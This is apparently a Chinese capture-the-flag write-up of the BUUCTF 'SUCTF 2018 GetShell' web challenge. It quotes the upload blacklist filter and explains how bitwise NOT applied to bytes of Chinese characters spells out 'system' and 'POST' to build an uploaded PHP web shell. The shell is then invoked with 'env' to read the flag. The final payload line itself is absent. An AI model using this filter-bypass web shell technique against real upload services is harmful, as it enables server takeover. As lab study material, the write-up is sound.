buuctf-web-[SUCTF 2018]GetShell1

不用多说,文件上传,打开环境

只有一个主界面和文件上传界面

if($contents=file_get_contents($_FILES["file"]["tmp_name"])){
    $data=substr($contents,5);
    foreach ($black_char as $b) {
        if (stripos($data, $b) !== false){
            die("illegal char");
        }
    }     
} 

没写禁止哪些参数,fuzz一下

buuctf-web-[SUCTF 2018]GetShell1_第1张图片

发现~可以利用

使用的是位运算里的“取反”。

利用的是UTF-8编码的某个汉字,并将其中某个字符取出来,比如'和'{2}的结果是"\x8c",其取反即为字母s

echo ~茉[$____];//s
echo ~内[$____];//y
echo ~茉[$____];//s
echo ~苏[$____];//t
echo ~的[$____];//e
echo ~咩[$____];//m
echo ~课[$____];//P
echo ~尬[$____];//O
echo ~笔[$____];//S
echo ~端[$____];//T
echo ~瞎[$____];//a

构造payload为

修改文件内容为以上代码

buuctf-web-[SUCTF 2018]GetShell1_第2张图片

查看上传上去的文件,发现可解析

对a参数传参env

buuctf-web-[SUCTF 2018]GetShell1_第3张图片

得到flag

flag{49d1b01a-8bd2-462e-bcdb-e50a5498a5f1}

你可能感兴趣的:(ctf,buuctfweb,网络安全,服务器,php,安全,网络安全,web安全)